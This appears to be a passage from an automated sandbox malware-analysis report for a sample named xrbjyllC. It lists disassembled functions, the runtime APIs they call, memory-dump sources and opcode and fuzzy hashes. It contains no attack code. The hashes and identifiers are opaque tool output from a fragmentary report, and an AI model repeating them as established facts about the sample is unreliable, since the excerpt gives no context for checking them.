                                                                                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                              Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3886058894-0
                                                                                              • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                              • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                              Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 004017EE
                                                                                                • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401800
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401813
                                                                                              • __recalloc.LIBCMT ref: 00401828
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401839
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401853
                                                                                              • _calloc.LIBCMT ref: 00401861
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                              • String ID:
                                                                                              • API String ID: 1721462702-0
                                                                                              • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                              • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                              Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 00414744
                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                              • __getptd.LIBCMT ref: 0041475B
                                                                                              • __amsg_exit.LIBCMT ref: 00414769
                                                                                              • __lock.LIBCMT ref: 00414779
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                              • String ID: @.B
                                                                                              • API String ID: 3521780317-470711618
                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                              Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 0040C6C8
                                                                                              • __fileno.LIBCMT ref: 0040C6D6
                                                                                              • __fileno.LIBCMT ref: 0040C6E2
                                                                                              • __fileno.LIBCMT ref: 0040C6EE
                                                                                              • __fileno.LIBCMT ref: 0040C6FE
                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2805327698-0
                                                                                              • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                              • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                              Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 00413FD8
                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                              • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                              • __lock.LIBCMT ref: 00414008
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                              • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                              • String ID:
                                                                                              • API String ID: 4271482742-0
                                                                                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                              Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                              • API String ID: 1646373207-3105848591
                                                                                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                              Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fileno.LIBCMT ref: 0040C77C
                                                                                              • __locking.LIBCMT ref: 0040C791
                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                              • String ID:
                                                                                              • API String ID: 2395185920-0
                                                                                              • Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                              • Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                              Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _fseek_malloc_memset
                                                                                              • String ID:
                                                                                              • API String ID: 208892515-0
                                                                                              • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                              • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                              Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                              • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                              Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89